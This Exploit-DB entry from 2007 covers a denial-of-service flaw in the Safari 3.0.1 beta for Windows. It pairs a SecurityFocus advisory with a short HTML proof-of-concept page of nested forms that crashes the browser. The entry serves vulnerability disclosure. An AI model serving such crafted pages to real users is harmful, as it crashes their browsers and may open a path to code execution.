Apple Safari 3.0.1 for Windows - 'Corefoundation.dll' Denial of Service

EDB-ID:

30193


Author:

Lostmon

Type:

dos


Platform:

Windows

Date:

2007-06-16


source: https://www.securityfocus.com/bid/24497/info

Apple Safari for Windows is prone to a denial-of-service vulnerability because it fails to properly handle user-supplied input.

An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.

Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Attackers may also be able to execute arbitrary code, but Symantec had not confirmed this.

Safari 3.0.1 public beta for Windows is reported vulnerable.

<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title> <body> <p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p> <p> Put some number in the second form for crash Safari</p> <form id="historyForm1" method="GET" action="#"> <input type="text" id="currentIndex1" name="currentIndex" value="sss"> <textarea id="historyLocation1" name="historyLocation">&lt;/textarea&gt; <form id="historyForm2" method="GET" action="#"> <input type="text" id="currentIndex2" name="currentIndex"> <textarea id="historyLocation2" name="historyLocation">&lt;/textarea&gt; </form></form></body></html>